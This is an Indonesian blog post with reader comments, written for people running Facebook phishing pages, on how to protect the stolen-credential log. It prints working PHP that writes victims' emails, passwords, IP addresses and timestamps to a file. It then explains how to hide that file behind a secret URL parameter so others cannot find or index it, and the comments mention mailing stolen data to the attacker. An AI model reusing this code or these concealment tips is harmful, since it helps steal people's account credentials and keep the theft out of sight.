Saturday, February 22, 2014

Cara Mengamankan file hasil Phising

Mungkin ada yang Belum Tau apa Sih Phising Itu: Phising adalah cara untuk mencoba mendapatkan informasi seperti username, password, dan rincian kartu kredit dengan menyamar sebagai entitas terpercaya dalam sebuah komunikasi elektronik. Komunikasi yang mengaku berasal dari populer situs web sosial, situs lelang, prosesor pembayaran online atau IT administrator biasanya digunakan untuk memikat publik tidak curiga. Phising biasanya dilakukan melalui e-mail spoofing atau pesan instan, dan sering mengarahkan pengguna untuk memasukkan rincian di sebuah website palsu yang tampilan dan nuansa yang hampir sama dengan yang aslinya..

Cara Mengamankan file hasil Phising

Buat Kalian Yang Ingin Membuat PHISING FACEBOOK Silahkan Lihat Tutorial Disini

Langsung aja
Bagi para phisinger Atau Pembuat Jebakan Batman Kali ini Saya Mau ngasih tutorial Dari Teman Bagaimana caranya agar korban Phising Facebook kita gak di nikmati banyak orang karena file txt kita ke index Oleh google....
pada Source Phising

$file = "login.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");

$handle = fopen($file, 'a');
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "
-->";?>

perhatikan code yang ane kasih warna merah $file = "login.txt"; artinya file hasil korban kita akan kesimpan dengan file txt dan jika keindex google bisa-bisa Di hajar  bareng bareng wkwkwkwkwkw Untuk Cara mengamankan Ganti login.txt  menjadi login.php lalu tambahkan di bagian atas sendiri code berikut

< ?php
if ($_REQUEST['cmd']!="cyberhacklink") {
die();
}
?>
maka ketika orang membuka file http://domainanda.com/login.php yang tampil adalah halaman kosong, jika ente pengen lihat file hasilnya cukup dengan url http://hostinganda.com/login.php?cmd=cyberhacklink
artikel di atas adalah cara Mengamankan Hasil Phising  Semoga Bermanfaat

Artikel Terkait

3 blogger-facebook

jadi ini untuk mencegah di hack atau kita yang hack?

trik ini untuk mengamankan hasil phising/hack kita sob.. Biar gak di ambil orang sob..

itu yangdiamankan halaman untuk mengirim pishingnya apa file buat nampung data2?
kalo ane pake mailer,jadi kalo ada data masuk langsung masuk ke email jadi aman


EmoticonEmoticon